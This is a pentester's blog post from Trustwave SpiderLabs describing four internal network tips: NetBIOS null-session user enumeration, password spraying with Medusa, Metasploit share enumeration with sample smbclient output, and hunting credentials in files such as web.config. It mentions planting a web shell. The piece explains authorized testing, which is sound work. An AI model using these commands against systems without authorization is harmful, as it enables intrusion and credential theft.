Trustwave's 2024 Retail Report Series Highlights Alarming E-Commerce Threats and Growing Fraud Against Retailers. Learn More

Request a Demo

Trustwave's 2024 Retail Report Series Highlights Alarming E-Commerce Threats and Growing Fraud Against Retailers. Learn More

Request a Demo
Services
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

View All Trustwave Services
Solutions
BY INDUSTRY
BY REGULATION
BY TOPIC
Microsoft Security
Unlock the full power of Microsoft Security
Offensive Security
Solutions to maximize your security ROI
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
We reduce cyber risk and fortify organizations
Awards and Accolades
Recognition by analysts and media outlets
Trustwave SpiderLabs Team
Global researchers, ethical hackers, and responders
Trustwave Fusion Security Operations Platform
Unprecedented security visibility and control
Trustwave Security Colony
Access to cybersecurity threat protection resources
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
Register
Login
Resources
BLOGS
UPCOMING
MEDIA & ASSETS
NOTICES
HELP

PenTesting: From Low Risk Issues to Sensitive Data Compromising

Change theme to light PenTesting: From Low Risk Issues to Sensitive Data Compromising
4 Minute Read by Bruno Oliveira

Yes, I imagine you are probably tired to see blog posts about "real-world" PenTesting, people talking about how to execute the perfect PenTest or what's the best tactical solution, well I am sick of that too. What I can say is that I have already seen dozens of this type of texts published around the world and I wanted to try something different, but different how?

Well, I am going to enumerate the top 4 techniques I use when I get in an environment without the common vulnerabilities that are usually discussed in other articles.

By no means this should be used as a guide or something along those lines, these are just some hints from a pentester (and hundreds of tests executed) that could be helpful to prevent attacks and also to execute a test successfully. These tips should work in more than 80% of the tests, and that is why I chose to list them.

I am not giving details about the vulnerabilities, because I don't think it is necessary! When you read these tips, you can assume they are in some specific order, however it is not necessary to be used in the order I describe maybe in your approach you may skip some of the steps or you can just utilize these techniques at any given time of the test.

No cutting-edge techniques will be posted here, as I mentioned, these are just a few tips/hints from my experience on offensive tasks.

1 - NetBIOS Null Session

Normally, when I got nothing on the network, just a few non-exploitable services, no sensitive traffic, etc. I utilize the NetBIOS Null Session vulnerability mainly found on the DNS servers to enumerate users from the domain, there is a little script that does is awesome for accomplishing this called enum4linux.pl (http://labs.portcullis.co.uk/application/enum4linux/) amongst others available that can also be used for that matter.

12735_f65962de-83c5-458d-86be-0a758ed687c1

2 - Easy Passwords

Ever since I joined SpiderLabs, I have been noticing that that users can be very lazy and that mostof passwords used out there are easy! After enumerating the usernames, you might want to try username as password and also Password123 and/orCompanyName123, you will probably retrieve some credentials. I usually use Medusa (http://www.foofus.net/~jmk/medusa/medusa.html) for brute-forcing, it's very simple and fast:

# medusa -hhost.you.retrieved.users -U userlist.txt -p Password123 -e s -O result -M smbnt

3 - Enumerate shared folders

If you happen to have any domain credentials that are not administrative accounts, the best thing todo is to enumerate the shared folders that you have access, there are several scripts that can make your life easier on this job, including a Metasploit (http://www.metasploit.com/)module:

msf > useauxiliary/scanner/smb/smb_enumshares

msfauxiliary(smb_enumshares) > set RHOSTS [TARGET HOST RANGE]

msfauxiliary(smb_enumshares) > run

It is not that uncommonto see shared folders that contain an entire drive (not administrative$ ones),and others not restricted containing sensitive information. It is very usefuleven when you don't have any credentials, anonymous shared folders sometimescan save our day!

While I was writingthis blog post, I was also executing an internal test where I found nothing,and I tried enumerating the shared folders with no credentials, you would besurprised how many shared folders I just had access, including entire drives,etc.

[*]172.16.1.172:139 My Book (H) - (DISK),E$ - Default share (DISK), IPC$ - Remote IPC (IPC), F Archive - (DISK), TV Archive1 - (DISK), TELESERVER1 - (DISK), G$ - Default share (DISK), TV Archive- (DISK), F$ - Default share (DISK),ADMIN$ - Remote Admin (DISK), H$ - Default share (DISK), ArchiverE - (DISK), C$ - Default share (DISK), Archiver- (DISK)

 

root@pentest:~#smbclient //172.16.1.172/Archiver

Enter root'spassword:

Domain=[XXXXXX]OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

smb: \> dir

$AVG DH 0 Thu Nov 4 09:00:45 2010

3com D 0 Tue Jul 17 12:08:47 2007

AUTOEXEC.BAT A 0 Wed Aug 11 18:15:00 2004

boot.ini AHSR 211 Tue Apr 3 12:54:48 2007

cda535ae48d15f7dca29bab5947e D 0 Sat Dec 16 05:29:13 2006

CONFIG.SYS A 0 Wed Aug 11 18:15:00 2004

dell D 0 ThuDec 14 09:23:23 2006

dell.sdr AHR 6177 Sat Nov 25 14:20:52 2006

Documents and Settings D 0 Thu Nov 4 08:58:19 2010

drivers D 0 Mon Aug 14 07:29:44 2006

FileSearch D 0 Fri Jan 18 09:41:16 2008

folder2 D 0 Fri Aug 24 14:38:50 2007

folder3 D 0 Mon Aug 27 11:34:19 2007

hiberfil.sys AHS 1005035520 Wed Aug 29 18:28:05 2012

i386 D 0 Tue Aug 21 15:02:41 2012

Inetpub D 0 Thu Jan 15 14:24:16 2009

INFCACHE.1 A 4128 Wed Jan 3 07:37:55 2007

IO.SYS AH 0 Wed Aug 11 18:15:00 2004

IPH.PH AH 832 Sat Nov 25 14:41:14 2006

iSeries Access Install Image D 0 Fri Apr 18 11:39:55 2008

MSDOS.SYS AH 0 Wed Aug 11 18:15:00 2004

My Documents D 0 Tue Oct 2 08:41:35 2007

NTDETECT.COM AHSR 47564 Wed Aug 4 06:00:00 2004

ntldr AHSR 250048 Fri Mar 11 08:45:00 2011

pagefile.sys AHS 1509949440 Wed Aug 29 18:28:05 2012

Program Files DR 0 Wed Sep 21 12:38:18 2011

RECYCLER DHS 0 Thu Mar 27 15:02:16 2008

Screen Savers D 0 Thu Jan 27 11:39:22 2011

Most of the times that you are able to list shared folders anonymously, you will be able to open the folders.

In this case, the environment had a XAMP running and the web root folder was on the drive H: that was shared as "My Book (H)". So, I was able to copy a web shell and compromise the system.

4 - Looking for important/helpful information on plain-text files

Based on my experience I know that all kinds of important information are saved by the users, not just passwords, but for example an Oracle SID can be very helpful since Oracle has multiple default credentials!This job is essentially manual, so you basically have to look for the information. I normally pick files named "New Text File.txt" or any" New*.*", Passwords*.*, and of course, the configuration files, web.config (connection string line ==sometimes password in plain-text), tnsnames.ora file, etc

Example:

<connectionStrings>

<add name="CPT_ConnectionString"

connectionString="Data Source=192.168.1.40\ccsql1;UserID=user;Password=pwd"

providerName="System.Data.SqlClient" />

</connectionStrings>

In the end, as I repeatedly said, nothing really new has been described above, however I bet that you, PenTester, might have forgot to take a deeper look at these simple techniques! I hope you enjoyed!

ABOUT TRUSTWAVE

Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.

Latest Intelligence

2024 Trustwave Risk Radar Report: Cyber Threats to the Retail Sector
Hooked by the Call: A Deep Dive into The Tricks Used in Callback Phishing Emails
How Threat Actors Conduct Election Interference Operations: An Overview

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Request a Demo